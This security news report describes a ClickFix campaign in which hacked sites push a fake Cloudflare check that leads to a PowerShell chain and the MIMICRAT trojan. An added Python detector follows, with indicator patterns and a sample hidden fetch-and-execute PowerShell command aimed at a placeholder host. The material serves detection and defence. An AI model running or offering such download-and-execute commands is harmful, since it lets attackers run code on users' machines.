Cybersecurity researchers have disclosed details of a new ClickFix campaign that uses compromised legitimate websites to distribute MIMICRAT (also known as AstarionRAT), a previously unseen remote access trojan (RAT). "The campaign exhibits a high degree of operational sophistication: a multi-stage PowerShell chain performs ETW and AMSI bypass before dropping a Lua-scripted shellcode loader, compromised sites from various industries and regions serve as delivery infrastructure, and the final implant communicates over HTTPS on port 443 using HTTP profiles that mimic authentic web analytics traffic," Elastic Security Labs said in a report published Friday.
The enterprise search and cybersecurity firm said MIMICRAT is a novel C++ RAT that supports SOCKS5 tunneling, Windows token impersonation, and a set of 22 commands for extensive post-exploitation capabilities.
The campaign was uncovered earlier this month. The entry point in the infection sequence highlighted by Elastic is bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was compromised to inject malicious JavaScript code that loads an externally hosted PHP script.
The PHP script then delivers the ClickFix lure: a fake Cloudflare verification page that instructs the victim to copy and paste a command into the Windows Run dialog to resolve a purported problem. Doing so executes a PowerShell command that contacts a command-and-control (C2) server to retrieve a second-stage PowerShell script, which bypasses the Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW) before launching a Lua-based loader.
In the final step, the Lua script decrypts shellcode and executes it in memory to deliver MIMICRAT. The trojan communicates with the C2 server over HTTPS and accepts two dozen commands covering process and file system control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling. According to security researcher Salim Bitam, "the campaign supports 17 languages, with the lure content dynamically localized based on the victim's browser language settings to broaden its effective reach."
"Identified victims span multiple geographies, including a university in the United States and multiple Chinese-speaking users documented in public forum discussions, suggesting broad opportunistic targeting."
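The ClickFix step described above leaves a distinctive telemetry footprint: a command pasted into the Run dialog is launched with explorer.exe as the parent, and the first stage is a PowerShell download cradle. The following detection logic is an added example, not code from the Elastic report; the event field names (Image, ParentImage, CommandLine) mirror Sysmon process-creation events, and the sample events and the example.invalid URL are constructed.

```python
"""Flag ClickFix-style launches: PowerShell spawned by explorer.exe (the parent
when a command is pasted into the Run dialog) with a download cradle or
defence-evasion switches on the command line. Added example; events are constructed."""
import re

# (regex, weight, label) applied to the lower-cased command line.
INDICATORS = [
    (r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", 3, "download cradle"),
    (r"\b(iex|invoke-expression)\b", 2, "in-memory execution"),
    (r"-(e|ec|enc|encodedcommand)\b", 2, "encoded command"),
    (r"-w(indowstyle)?\s+hidden", 1, "hidden window"),
    (r"-(nop|noprofile)\b", 1, "profile suppressed"),
    (r"https?://", 1, "remote URL"),
]
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}  # Win+R / Run dialog launches via explorer.exe

def score_event(ev):
    """Return (score, reasons) for one process-creation event dict."""
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "").lower()
    if image not in SCRIPT_HOSTS:
        return 0, []
    score, reasons = 0, []
    if parent in INTERACTIVE_PARENTS:  # user pasted/typed the command interactively
        score += 3
        reasons.append(f"spawned by {parent}")
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, cmd):
            score += weight
            reasons.append(label)
    return score, reasons

def detect(events, threshold=6):
    """Return [(event, score, reasons)] for events at or above the alert threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits

# Constructed sample telemetry: one ClickFix-like launch and one benign scheduled script.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iex (iwr https://example.invalid/verify -UseBasicParsing)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\scripts\rotate-logs.ps1"},
]

if __name__ == "__main__":
    for ev, score, reasons in detect(SAMPLE_EVENTS):
        print(score, ev["CommandLine"], "|", ", ".join(reasons))
```

The explorer.exe-parent weight is what separates a pasted command from an administrator's scripted PowerShell use; in production, pair it with the RunMRU registry key to recover the pasted string itself.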